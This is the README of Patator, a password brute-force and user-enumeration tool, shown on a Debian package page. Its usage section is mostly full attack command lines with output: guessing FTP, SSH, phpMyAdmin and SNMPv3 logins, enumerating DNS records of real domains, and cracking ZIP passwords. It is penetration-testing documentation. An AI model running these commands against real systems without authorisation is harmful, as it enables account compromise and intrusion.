File: README.md

package info (click to toggle)
patator 0.7-2
  • links: PTS, VCS
  • area: main
  • in suites: bullseye, buster, sid
  • size: 448 kB
  • sloc: python: 7,259; makefile: 6
file content (311 lines) | stat: -rw-r--r-- 19,451 bytes parent folder | download
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
Patator was written out of frustration from using Hydra, Medusa, Ncrack, Metasploit modules and Nmap NSE scripts for password guessing attacks. I opted for a different approach in order to not create yet another brute-forcing tool and avoid repeating the same shortcomings. Patator is a multi-threaded tool written in Python, that strives to be more reliable and flexible than his fellow predecessors.

Currently it supports the following modules:

```
* ftp_login      : Brute-force FTP
* ssh_login      : Brute-force SSH
* telnet_login   : Brute-force Telnet
* smtp_login     : Brute-force SMTP
* smtp_vrfy      : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt      : Enumerate valid users using the SMTP RCPT TO command
* finger_lookup  : Enumerate valid users using Finger
* http_fuzz      : Brute-force HTTP/HTTPS
* ajp_fuzz       : Brute-force AJP
* pop_login      : Brute-force POP
* pop_passd      : Brute-force poppassd (not POP3)
* imap_login     : Brute-force IMAP
* ldap_login     : Brute-force LDAP
* smb_login      : Brute-force SMB
* smb_lookupsid  : Brute-force SMB SID-lookup
* rlogin_login   : Brute-force rlogin
* vmauthd_login  : Brute-force VMware Authentication Daemon
* mssql_login    : Brute-force MSSQL
* oracle_login   : Brute-force Oracle
* mysql_login    : Brute-force MySQL
* mysql_query    : Brute-force MySQL queries
* rdp_login      : Brute-force RDP (NLA)
* pgsql_login    : Brute-force PostgreSQL
* vnc_login      : Brute-force VNC
* dns_forward    : Brute-force DNS
* dns_reverse    : Brute-force DNS (reverse lookup subnets)
* ike_enum       : Enumerate IKE transforms
* snmp_login     : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass     : Brute-force the password of encrypted ZIP files
* keystore_pass  : Brute-force the password of Java keystore files
* sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
* umbraco_crack  : Crack Umbraco HMAC-SHA1 password hashes
```

The name "Patator" comes from https://www.youtube.com/watch?v=kU2yPJJdpag

Patator is NOT script-kiddie friendly, please read the README inside `patator.py` before reporting.

@lanjelot

## Usage Examples

* FTP : Enumerating users denied login in vsftpd/userlist

```
$ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
19:36:06 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 19:36 AEDT
19:36:06 patator    INFO -
19:36:06 patator    INFO - code  size    time | candidate                          |   num | mesg
19:36:06 patator    INFO - -----------------------------------------------------------------------------
19:36:07 patator    INFO - 230   17     0.002 | anonymous                          |     7 | Login successful.
19:36:07 patator    INFO - 230   17     0.001 | ftp                                |    10 | Login successful.
19:36:08 patator    INFO - 530   18     1.000 | root                               |     1 | Permission denied.
19:36:17 patator    INFO - 530   18     1.000 | michael                            |    50 | Permission denied.
19:36:36 patator    INFO - 530   18     1.000 | robert                             |    93 | Permission denied.
...
```

Tested against `vsftpd-3.0.2-9` on `CentOS 7.0-1406`

* SSH : Time-based user enumeration

```
$ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e "print 'A'x50000") --max-retries 0 --timeout 10 -x ignore:time=0-3
17:45:20 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-02-08 17:45 AEDT
17:45:20 patator    INFO -
17:45:20 patator    INFO - code  size    time | candidate                          |   num | mesg
17:45:20 patator    INFO - -----------------------------------------------------------------------------
17:45:30 patator    FAIL - xxx   41    10.001 | root                               |     1 | <class '__main__.TimeoutError'> timed out
17:45:34 patator    FAIL - xxx   41    10.000 | john                               |    23 | <class '__main__.TimeoutError'> timed out
17:45:37 patator    FAIL - xxx   41    10.000 | joe                                |    40 | <class '__main__.TimeoutError'> timed out
...
```

Tested against openssh-server 1:6.0p1-4+deb7u2 on Debian 7.8

* HTTP : Brute-force phpMyAdmin logon

```
$ http_fuzz url=http://10.0.0.1/pma/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en&token=' 0=combos.txt before_urls=http://10.0.0.1/pma/index.php accept_cookie=1 follow=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
11:53:47 patator    INFO - Starting Patator v0.7-beta (http://code.google.com/p/patator/) at 2014-08-31 11:53 EST
11:53:47 patator    INFO -
11:53:47 patator    INFO - code size:clen       time | candidate                          |   num | mesg
11:53:47 patator    INFO - -----------------------------------------------------------------------------
11:53:48 patator    INFO - 200  49585:0        0.150 | root:p@ssw0rd                      |    26 | HTTP/1.1 200 OK
11:53:51 patator    INFO - 200  13215:0        0.351 | root:                              |    72 | HTTP/1.1 200 OK
^C
11:53:54 patator    INFO - Hits/Done/Skip/Fail/Size: 2/198/0/0/3000, Avg: 29 r/s, Time: 0h 0m 6s
11:53:54 patator    INFO - To resume execution, pass --resume 15,15,15,16,15,36,15,16,15,40
```

Payload #72 was a false positive due to an unexpected error message:

```
$ grep AllowNoPassword /tmp/qsdf/72_200\:13215\:0\:0.351.txt
... class="icon ic_s_error" /> Login without a password is forbidden by configuration (see AllowNoPassword)</div><noscript>
```

Tested against phpMyAdmin 4.2.7.1.

* IKE : Enumerate transforms supported by VPN peer

```
# ike_enum host=10.0.0.1 transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 -x ignore:fgrep='NO-PROPOSAL'
16:52:58 patator    INFO - Starting Patator v0.7-beta (https://github.com/lanjelot/patator) at 2015-04-05 16:52 AEST
16:52:58 patator    INFO -
16:52:58 patator    INFO - code  size    time | candidate                          |   num | mesg
16:52:58 patator    INFO - -----------------------------------------------------------------------------
16:53:03 patator    INFO - 0     70     0.034 | 5,1,1,2:0                          |  1539 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Main)
16:53:03 patator    INFO - 0     72     0.031 | 5,1,65001,2:0                      |  1579 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH (Main)
16:53:03 patator    INFO - 0     76     0.033 | 5,1,1,2:1                          |  1540 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:03 patator    INFO - 0     78     0.034 | 5,1,65001,2:1                      |  1580 | Handshake returned: Enc=3DES Hash=MD5 Group=2:modp1024 Auth=XAUTH (Aggressive)
16:53:06 patator    INFO - 0     84     0.034 | 7/128,2,1,2:0                      |  2371 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Main)
16:53:06 patator    INFO - 0     90     0.033 | 7/128,2,1,2:1                      |  2372 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=PSK (Aggressive)
16:53:06 patator    INFO - 0     86     0.034 | 7/128,2,65001,2:0                  |  2411 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH (Main)
16:53:06 patator    INFO - 0     92     0.035 | 7/128,2,65001,2:1                  |  2412 | Handshake returned: Enc=AES KeyLength=128 Hash=SHA1 Group=2:modp1024 Auth=XAUTH (Aggressive)

+ 10.0.0.1:500 (Main Mode)
    Encryption       Hash         Auth      Group
    ---------- ----------   ---------- ----------
          3DES        MD5          PSK   modp1024
          3DES        MD5        XAUTH   modp1024
        AES128       SHA1          PSK   modp1024
        AES128       SHA1        XAUTH   modp1024

+ 10.0.0.1:500 (Aggressive Mode)
    Encryption       Hash         Auth      Group
    ---------- ----------   ---------- ----------
          3DES        MD5          PSK   modp1024
          3DES        MD5        XAUTH   modp1024
        AES128       SHA1          PSK   modp1024
        AES128       SHA1        XAUTH   modp1024
16:53:11 patator    INFO - Hits/Done/Skip/Fail/Size: 8/3840/0/0/3840, Avg: 284 r/s, Time: 0h 0m 13s
```

* SNMPv3 : Find valid usernames

```
$ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
17:51:06 patator    INFO - Starting Patator v0.5
17:51:06 patator    INFO -
17:51:06 patator    INFO - code  size | candidate                          |   num | mesg
17:51:06 patator    INFO - ----------------------------------------------------------------------
17:51:11 patator    INFO - 0-0   11   | robert                             |    55 | wrongDigest
17:51:12 patator    INFO - Progress:  20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
17:51:33 patator    INFO - 0-0   11   | myuser                             |   311 | wrongDigest
17:51:36 patator    INFO - Hits/Done/Skip/Fail/Size: 2/345/0/0/345, Avg: 11 r/s, Time: 0h 0m 30s
```

* SNMPv3 : Find valid passwords

```
$ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
17:52:15 patator    INFO - Starting Patator v0.5
17:52:15 patator    INFO -
17:52:15 patator    INFO - code  size | candidate                          |   num | mesg
17:52:15 patator    INFO - ----------------------------------------------------------------------
17:52:16 patator    INFO - 0-0   69   | password123                        |    16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
17:52:17 patator    INFO - Hits/Done/Skip/Fail/Size: 1/50/0/0/50, Avg: 38 r/s, Time: 0h 0m 1s
```

* DNS : Forward lookup

```
$ dns_forward name=FILE0.hsc.fr 0=names.txt -x ignore:code=3
03:18:46 patator    INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:18 PMT
03:18:46 patator    INFO -
03:18:46 patator    INFO - code  size | candidate                          |   num | mesg
03:18:46 patator    INFO - ----------------------------------------------------------------------
03:18:46 patator    INFO - 0     41   | www                                |     4 | NOERROR [www.hsc.fr. IN A 217.174.211.25]
03:18:46 patator    INFO - 0     81   | mail                               |    32 | NOERROR [mail.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator    INFO - 0     44   | webmail                            |    62 | NOERROR [webmail.hsc.fr. IN A 192.70.106.95]
03:18:46 patator    INFO - 0     93   | test                               |    54 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:46 patator    INFO - 0     40   | wap                                |    66 | NOERROR [wap.hsc.fr. IN A 192.70.106.33]
03:18:46 patator    INFO - 0     85   | extranet                           |   131 | NOERROR [extranet.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator    INFO - 0     81   | news                               |   114 | NOERROR [news.hsc.fr. IN CNAME itesec.hsc.fr.][itesec.hsc.fr. IN A 192.70.106.33]
03:18:46 patator    INFO - 0     93   | mailhost                           |   137 | NOERROR [mailhost.hsc.fr. IN A 192.70.106.33][mailhost.hsc.fr. IN AAAA 2001:7a8:1155:2::abcd]
03:18:46 patator    INFO - 0     47   | lists                              |   338 | NOERROR [lists.hsc.fr. IN MX 10 itesec.hsc.fr.]
03:18:46 patator    INFO - 0     93   | fr                                 |   319 | NOERROR [hsc.fr. IN SOA itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600]
03:18:47 patator    INFO - 0     40   | gl                                 |   586 | NOERROR [gl.hsc.fr. IN A 192.70.106.103]
Records ------------------------------------------
                  extranet.hsc.fr.   IN CNAME   itesec.hsc.fr.
                        gl.hsc.fr.   IN A       192.70.106.103
                           hsc.fr.   IN SOA     itesec.hsc.fr. hostmaster.hsc.fr. 2012012301 21600 3600 1209600 3600
                    itesec.hsc.fr.   IN A       192.70.106.33
                     lists.hsc.fr.   IN MX      10 itesec.hsc.fr.
                      mail.hsc.fr.   IN CNAME   itesec.hsc.fr.
                  mailhost.hsc.fr.   IN A       192.70.106.33
                  mailhost.hsc.fr.   IN AAAA    2001:7a8:1155:2::abcd
                      news.hsc.fr.   IN CNAME   itesec.hsc.fr.
                       wap.hsc.fr.   IN A       192.70.106.33
                   webmail.hsc.fr.   IN A       192.70.106.95
                       www.hsc.fr.   IN A       217.174.211.25
Hostmap ------------------------------------------
                   mailhost.hsc.fr 2001:7a8:1155:2::abcd
                   mailhost.hsc.fr 192.70.106.33
                        wap.hsc.fr 192.70.106.33
                     itesec.hsc.fr 192.70.106.33
                   extranet.hsc.fr
                       mail.hsc.fr
                       news.hsc.fr
                    webmail.hsc.fr 192.70.106.95
                         gl.hsc.fr 192.70.106.103
                        www.hsc.fr 217.174.211.25
Domains ------------------------------------------
                            hsc.fr 10
Networks -----------------------------------------
                                   2001:7a8:1155:2::abcd
                                   192.70.106.x
                                   217.174.211.25
03:18:53 patator    INFO - Hits/Done/Skip/Fail/Size: 11/1000/0/0/1000, Avg: 133 r/s, Time: 0h 0m 7s
```

Also notice that test.hsc.fr. is the start of a new zone because we got NOERROR and no IP address.

* DNS : Reverse lookup two netblocks owned by Google

```
$ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
03:24:22 patator    INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 03:24 PMT
03:24:22 patator    INFO -
03:24:22 patator    INFO - code  size | candidate                          |   num | mesg
03:24:22 patator    INFO - ----------------------------------------------------------------------
03:24:22 patator    INFO - 0     46   | 216.239.32.10                      |    11 | NOERROR [216.239.32.10 IN PTR ns1.google.com.]
03:24:22 patator    INFO - 0     45   | 216.239.32.11                      |    12 | NOERROR [216.239.32.11 IN PTR ns.google.com.]
03:24:22 patator    INFO - 0     48   | 216.239.32.15                      |    16 | NOERROR [216.239.32.15 IN PTR time1.google.com.]
03:24:23 patator    INFO - 0     47   | 216.239.33.5                       |   262 | NOERROR [216.239.33.5 IN PTR proxy.google.com.]
03:24:23 patator    INFO - 0     47   | 216.239.33.12                      |   269 | NOERROR [216.239.33.12 IN PTR dns1.google.com.]
03:24:23 patator    INFO - 0     51   | 216.239.33.22                      |   279 | NOERROR [216.239.33.22 IN PTR transfer.google.com.]
03:24:23 patator    INFO - 0     50   | 216.239.33.20                      |   277 | NOERROR [216.239.33.20 IN PTR esc-out.google.com.]
03:24:23 patator    INFO - 0     46   | 216.239.34.10                      |   523 | NOERROR [216.239.34.10 IN PTR ns2.google.com.]
03:24:23 patator    INFO - 0     48   | 216.239.34.15                      |   528 | NOERROR [216.239.34.15 IN PTR time2.google.com.]
^C
Records ------------------------------------------
                     216.239.32.10       IN PTR      ns1.google.com.
                     216.239.32.11       IN PTR      ns.google.com.
                     216.239.32.15       IN PTR      time1.google.com.
                     216.239.33.12       IN PTR      dns1.google.com.
                     216.239.33.20       IN PTR      esc-out.google.com.
                     216.239.33.22       IN PTR      transfer.google.com.
                      216.239.33.5       IN PTR      proxy.google.com.
                     216.239.34.10       IN PTR      ns2.google.com.
                     216.239.34.15       IN PTR      time2.google.com.
Hostmap ------------------------------------------
                    ns1.google.com 216.239.32.10
                     ns.google.com 216.239.32.11
                  time1.google.com 216.239.32.15
                  proxy.google.com 216.239.33.5
                   dns1.google.com 216.239.33.12
                esc-out.google.com 216.239.33.20
               transfer.google.com 216.239.33.22
                    ns2.google.com 216.239.34.10
                  time2.google.com 216.239.34.15
Domains ------------------------------------------
                        google.com 9
Networks -----------------------------------------
                                   216.239.32.x
                                   216.239.33.x
                                   216.239.34.x
03:24:29 patator    INFO - Hits/Done/Skip/Fail/Size: 9/872/0/0/4352, Avg: 115 r/s, Time: 0h 0m 7s
03:24:29 patator    INFO - To resume execution, pass --resume 91,75,93,73,84,95,94,95,83,89
```

* ZIP : Crack a password-protected ZIP file (older pkzip encryption used not to be supported in JtR)

```
$ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0
10:54:29 patator    INFO - Starting Patator v0.5 (http://code.google.com/p/patator/) at 2012-06-29 10:54:29 PMT
10:54:29 patator    INFO -
10:54:29 patator    INFO - code  size | candidate                          |   num | mesg
10:54:29 patator    INFO - ----------------------------------------------------------------------
10:54:30 patator    INFO - 0     82   | love                               |   387 | 0 [82] No errors detected in compressed data of challenge1.zip.
^C
10:54:31 patator    INFO - Hits/Done/Skip/Fail/Size: 1/1589/0/0/5000, Avg: 699 r/s, Time: 0h 0m 2s
10:54:31 patator    INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154
```

## PyInstaller
### Bundling on Windows 5.2.3790 x86

Install `python-2.7.9.msi` from [Python](https://www.python.org/downloads/windows/).
Install `pywin32-219.win32-py2.7.exe` from [PyWin32](http://sourceforge.net/projects/pywin32/files/pywin32/).
Install `vcredist_x86.exe` from [Microsoft](http://www.microsoft.com/en-us/download/confirmation.aspx?id=29).
Install `Git-1.9.5.exe` from [Git](http://git-scm.com/download/win) (and select "Use Git from Windows Command Prompt" during install).
Add `c:\Python27;c:\Python27\Scripts` to your `PATH`.

```
pip install pycrypto pyopenssl
pip install impacket
pip install paramiko
pip install IPy
pip install dnspython
pip install pysnmp

cd c:\
git clone https://github.com/lanjelot/patator
git clone https://github.com/pyinstaller/pyinstaller
cd pyinstaller
git checkout a2b0617251ebe70412f6e3573f00a49ce08b7b32 # fixes this issue: https://groups.google.com/forum/#!topic/pyinstaller/6xD75_w4F-c
python pyinstaller.py --clean --onefile c:\patator\patator.py
patator\dist\patator.exe -h
```

The resulting stand-alone `patator.exe` executable was confirmed to run successfully on Windows 2003 (5.2.3790), Windows 7 (6.1.7600), Windows 2008 R2 SP1 (6.1.7601) and Windows 2012 R2 (6.3.9600), and is likely to work fine on other Windows versions.

Refer to [#50](https://github.com/lanjelot/patator/issues/50) for more info.